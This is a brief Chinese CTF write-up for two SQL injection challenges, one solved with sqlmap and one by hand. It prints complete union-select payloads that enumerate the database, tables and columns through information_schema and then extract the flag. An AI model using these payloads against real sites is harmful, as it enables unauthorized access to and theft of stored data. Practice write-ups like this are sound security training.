实战2-注入

打开是个网页（实战嘛），提示是注入问题，那就找注入点。在url里找?id=...的形式，最后在news那里找到了。用sqlmap进行注入测试：

显示的是可以注入，那就进行注入吧。

两个数据库，逐个验证知道要的是第二个数据库 最后一个表名就是要的flag

这是一个神奇的登陆框

url显示的是个注入问题，右键查看源码，显示的是要输入admin的账号，那就用户名admin，密码随便写个1，尝试登陆，结果不行。那密码写1'，还是不行。试试1"，结果页面返回sql注入错误，说明可以注入！用order by查明两个字段，而且也没用什么过滤。然后就尽情注入获取flag。

构造" union select  database(),1 #获取数据库名bugkusql1

构造" union  select  table_name,1  from  information_schema.tables  where table_schema='bugkusql1'#获取表名flag1

构造" union select  column_name,1 from information_schema.columns  where  table_schema='bugkusql1' and table_name='flag1'#获取列名flag1

构造" union select flag1,1  from flag1#获取flag